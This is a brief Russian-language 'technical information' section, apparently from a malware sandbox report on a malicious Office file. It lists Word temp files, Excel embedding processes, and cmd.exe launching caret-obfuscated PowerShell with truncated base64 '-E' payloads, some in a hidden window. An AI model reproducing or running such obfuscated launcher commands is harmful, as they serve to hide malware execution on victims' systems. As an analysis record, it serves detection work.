Техническая информация
- '<SYSTEM32>\cmd.exe' /C Po^w^ERs^hE^Ll -E WwBTAHkAcwBUAEUATQAuAHQARQBYAHQALgBFAE4AQwBPAGQAaQBOAGcAXQA6ADoAVQBuAGkAYwBvAGQARQAuAGcAZQBUAHMAdAByAEkATgBHACgAWwBTAFkAcwBUAEUAbQAuAGMAbwBuAHYAZQBSAHQAXQA6ADoAZgBSAG8AbQBC...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{40b2440b-8b40-46c0-b07c-318fab8cd4b5}.tmp
- '<SYSTEM32>\cmd.exe' /C Po^w^ERs^hE^Ll -E WwBTAHkAcwBUAEUATQAuAHQARQBYAHQALgBFAE4AQwBPAGQAaQBOAGcAXQA6ADoAVQBuAGkAYwBvAGQARQAuAGcAZQBUAHMAdAByAEkATgBHACgAWwBTAFkAcwBUAEUAbQAuAGMAbwBuAHYAZQBSAHQAXQA6ADoAZgBSAG8AbQBC...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E WwBTAHkAcwBUAEUATQAuAHQARQBYAHQALgBFAE4AQwBPAGQAaQBOAGcAXQA6ADoAVQBuAGkAYwBvAGQARQAuAGcAZQBUAHMAdAByAEkATgBHACgAWwBTAFkAcwBUAEUAbQAuAGMAbwBuAHYAZQBSAHQAXQA6ADoAZgBSAG8AbQBCAEEAUwBFADYANABTAH...
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding